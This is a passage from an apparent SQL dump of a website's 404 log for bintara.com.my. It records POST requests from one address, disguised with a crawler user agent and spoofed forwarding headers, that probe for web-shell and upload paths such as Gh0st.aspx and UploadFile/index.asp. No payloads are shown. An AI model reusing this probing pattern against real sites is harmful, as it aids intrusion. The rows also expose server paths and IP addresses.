Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"211.100.133.181\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"211.100.133.181\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/inc/AspCms_AdvJs.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Sn9aMiBShLW1lPtcTDgAAAAY\";s:12:\"REDIRECT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"58266\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/inc/AspCms_AdvJs.asp\";s:10:\"SCRIPT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Sn9aMiBShLW1lPtcTDgAAAAY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803808.0275\";s:12:\"REQUEST_TIME\";s:10:\"1571803808\";}}','notice','2019-10-23 04:10:11','2019-10-23 04:10:08',35269528,37071488,'http://bintara.com.my//inc/AspCms_AdvJs.asp',1,0,'211.100.133.181'),(28796,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//UploadFile/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"202.127.121.84\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"202.127.121.84\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/UploadFile/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/UploadFile/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Sp9aMiBShLW1lPtcTEQAAAAU\";s:12:\"REDIRECT_URL\";s:21:\"/UploadFile/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"58266\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/UploadFile/index.asp\";s:10:\"SCRIPT_URL\";s:21:\"/UploadFile/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Sp9aMiBShLW1lPtcTEQAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803815.8467\";s:12:\"REQUEST_TIME\";s:10:\"1571803815\";}}','notice','2019-10-23 04:10:18','2019-10-23 04:10:16',35342560,37142752,'http://bintara.com.my//UploadFile/index.asp',1,0,'202.127.121.84'),(28797,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//UploadFile/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"202.96.84.106\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"202.96.84.106\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/UploadFile/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/UploadFile/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-StK6CYj3S7An3VFFrDwAAAVQ\";s:12:\"REDIRECT_URL\";s:21:\"/UploadFile/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"58849\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/UploadFile/index.asp\";s:10:\"SCRIPT_URL\";s:21:\"/UploadFile/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-StK6CYj3S7An3VFFrDwAAAVQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803828.3262\";s:12:\"REQUEST_TIME\";s:10:\"1571803828\";}}','notice','2019-10-23 04:10:30','2019-10-23 04:10:28',35270696,37069400,'http://bintara.com.my//UploadFile/index.asp',1,0,'202.96.84.106'),(28798,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//guanlimb/shiwei.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"123.253.5.91\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"123.253.5.91\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/guanlimb/shiwei.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/guanlimb/shiwei.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-SyK6CYj3S7An3VFFrIAAAAU8\";s:12:\"REDIRECT_URL\";s:20:\"/guanlimb/shiwei.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"58849\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/guanlimb/shiwei.asp\";s:10:\"SCRIPT_URL\";s:20:\"/guanlimb/shiwei.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-SyK6CYj3S7An3VFFrIAAAAU8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803848.9358\";s:12:\"REQUEST_TIME\";s:10:\"1571803848\";}}','notice','2019-10-23 04:10:53','2019-10-23 04:10:49',35733184,37530808,'http://bintara.com.my//guanlimb/shiwei.asp',1,0,'123.253.5.91'),(28799,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//guanlimb/shiwei.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"121.25.9.102\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"121.25.9.102\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/guanlimb/shiwei.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/guanlimb/shiwei.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Sz66CYj3S7An3VFFrIQAAAUI\";s:12:\"REDIRECT_URL\";s:20:\"/guanlimb/shiwei.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"59789\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/guanlimb/shiwei.asp\";s:10:\"SCRIPT_URL\";s:20:\"/guanlimb/shiwei.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Sz66CYj3S7An3VFFrIQAAAUI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803855.3895\";s:12:\"REQUEST_TIME\";s:10:\"1571803855\";}}','notice','2019-10-23 04:10:58','2019-10-23 04:10:56',35270472,37068416,'http://bintara.com.my//guanlimb/shiwei.asp',1,0,'121.25.9.102'),(28800,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//admin/css/Gh0st.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"121.89.151.51\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"121.89.151.51\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/admin/css/Gh0st.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/admin/css/Gh0st.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-TCa6CYj3S7An3VFFrPgAAAU4\";s:12:\"REDIRECT_URL\";s:21:\"/admin/css/Gh0st.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"61318\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/admin/css/Gh0st.aspx\";s:10:\"SCRIPT_URL\";s:21:\"/admin/css/Gh0st.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-TCa6CYj3S7An3VFFrPgAAAU4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571803913.866\";s:12:\"REQUEST_TIME\";s:10:\"1571803913\";}}','notice','2019-10-23 04:11:57','2019-10-23 04:11:54',35342192,37147224,'http://bintara.com.my//admin/css/Gh0st.aspx',1,0,'121.89.151.51'),(28801,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//admin/css/Gh0st.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"202.165.244.216\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"202.165.244.216\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/admin/css/Gh0st.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/admin/css/Gh0st.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-TEa6CYj3S7An3VFFrRwAAAUA\";s:12:\"REDIRECT_URL\";s:21:\"/admin/css/Gh0st.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"61318\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/admin/css/Gh0st.aspx\";s:10:\"SCRIPT_URL\";s:21:\"/admin/css/Gh0st.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-TEa6CYj3S7An3VFFrRwAAAUA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803921.4255\";s:12:\"REQUEST_TIME\";s:10:\"1571803921\";}}','notice','2019-10-23 04:12:04','2019-10-23 04:12:02',35269264,37078896,'http://bintara.com.my//admin/css/Gh0st.aspx',1,0,'202.165.244.216'),(28802,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//images/upload.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"210.14.224.158\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"210.14.224.158\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/images/upload.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/images/upload.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-TG9aMiBShLW1lPtcTHAAAABc\";s:12:\"REDIRECT_URL\";s:18:\"/images/upload.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"61906\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/images/upload.asp\";s:10:\"SCRIPT_URL\";s:18:\"/images/upload.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-TG9aMiBShLW1lPtcTHAAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803932.8493\";s:12:\"REQUEST_TIME\";s:10:\"1571803932\";}}','notice','2019-10-23 04:12:14','2019-10-23 04:12:13',35339184,37137952,'http://bintara.com.my//images/upload.asp',1,0,'210.14.224.158'),(28803,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//images/upload.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.178.11.196\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.178.11.196\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/images/upload.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/images/upload.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-TKSGcwml6EYyVWZHU2wAAAIE\";s:12:\"REDIRECT_URL\";s:18:\"/images/upload.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"62370\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/images/upload.asp\";s:10:\"SCRIPT_URL\";s:18:\"/images/upload.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-TKSGcwml6EYyVWZHU2wAAAIE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803946.0469\";s:12:\"REQUEST_TIME\";s:10:\"1571803946\";}}','notice','2019-10-23 04:12:28','2019-10-23 04:12:26',35267960,37058368,'http://bintara.com.my//images/upload.asp',1,0,'220.178.11.196'),(28804,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//images/imgs.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 